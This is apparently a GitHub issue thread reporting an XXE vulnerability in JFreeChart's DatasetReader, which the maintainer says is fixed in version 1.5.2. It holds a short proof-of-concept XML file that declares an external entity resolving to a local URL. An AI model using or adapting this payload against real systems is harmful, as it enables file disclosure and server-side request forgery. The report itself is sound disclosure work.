XML Parse Bug #130

Closed
kingkaki opened this issue Sep 5, 2019 · 1 comment
kingkaki commented Sep 5, 2019

You have not set the security feature, which causes XXE (XML external entity attack).

Code:

```java
DatasetReader.readPieDatasetFromXML(new File("1.xml"));
DatasetReader.readCategoryDatasetFromXML(new File("1.xml"));
```

1.xml:

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE sec [
        <!ENTITY xxe SYSTEM "http://localhost:8000" >]>
<CategoryDataset>&xxe;</CategoryDataset>
```

hashtagviv pushed a commit to hashtagviv/jfreechart that referenced this issue Dec 11, 2019
jfree commented Nov 13, 2020

Thanks for the report. I've committed a fix for the upcoming version 1.5.2 release.

@jfree jfree closed this as completed Nov 13, 2020
jfree added a commit that referenced this issue Nov 13, 2020